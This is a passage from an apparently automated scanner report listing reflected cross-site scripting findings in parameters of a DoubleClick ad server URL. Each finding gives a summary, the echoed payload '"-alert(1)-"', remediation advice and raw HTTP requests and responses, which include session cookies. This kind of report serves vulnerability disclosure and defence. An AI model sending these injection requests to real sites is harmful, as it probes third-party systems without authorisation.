386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3bddae"-alert(1)-"32d4a8875d7&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://
...[SNIP]...

3.171. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9cf4"-alert(1)-"67ea7960a5 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7302

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
p://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=c9cf4"-alert(1)-"67ea7960a5&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q10000001403000
...[SNIP]...

3.172. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd56a"-alert(1)-"5892d568ade was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568ade HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7294
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:20:36 GMT
Expires: Wed, 27 Apr 2011 23:20:36 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=bd56a"-alert(1)-"5892d568adehttp://us.blackberry.com/playbook-tablet/?CPID=STBANNAUSFY12Q1000000140300000310128004BAN074");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcall
...[SNIP]...

3.173. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1263e"-alert(1)-"fe5cbeb2d43 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn1263e"-alert(1)-"fe5cbeb2d43&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=n
...[SNIP]...

3.174. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ab5"-alert(1)-"f00fa922e97 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
48%3B2-0%3B0%3B61926988%3B4307-300/250%3B41900386/41918173/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US89ab5"-alert(1)-"f00fa922e97&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwY
...[SNIP]...

3.175. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99b24"-alert(1)-"62791cafedf was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=3111699b24"-alert(1)-"62791cafedf&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.
...[SNIP]...

3.176. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8d07"-alert(1)-"853a60c8716 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7/166/%2a/d%3B240097948%3B0-0%3B0%3B61926988%3B4307-300/250%3B41748593/41766380/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253ac8d07"-alert(1)-"853a60c8716&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243
...[SNIP]...

3.177. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76fd8"-alert(1)-"b133118e764 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7190

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
s%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=76fd8"-alert(1)-"b133118e764&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet?CPID=STBANNAUSFY12Q10000
...[SNIP]...

3.178. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de79b"-alert(1)-"244fdf90e7b was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7193

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.comde79b"-alert(1)-"244fdf90e7b&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/http://us.blackberry.com/playbook-tablet/?CPID=STBANNA
...[SNIP]...

3.179. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14b30"-alert(1)-"7bf3c7cc635 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7306

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/e%3B240097948%3B1-0%3B0%3B61926988%3B4307-300/250%3B41748971/41766758/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509421%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=214b30"-alert(1)-"7bf3c7cc635&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3
...[SNIP]...

3.180. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc97"-alert(1)-"306082136f6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5374276.15;sz=300x250;pc=cbs509421;click0=http://adlog.com.com/adlog/e/r=17246&sg=509421&o=10784%253a31116%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8328&nd=31116&pid=&cid=0&pp=100&e=3&rqid=01phx1-ad-e17:4DB8370F820498&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comabc97"-alert(1)-"306082136f6&cpnmodule=&count=&ra=173.193.214.243&pg=nH6f3AoOYI8AAEzwYC4AAAAX&t=2011.04.27.23.15.06&event=58/;ord=2011.04.27.23.15.06? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/latest-news/?tag=hdr;snav
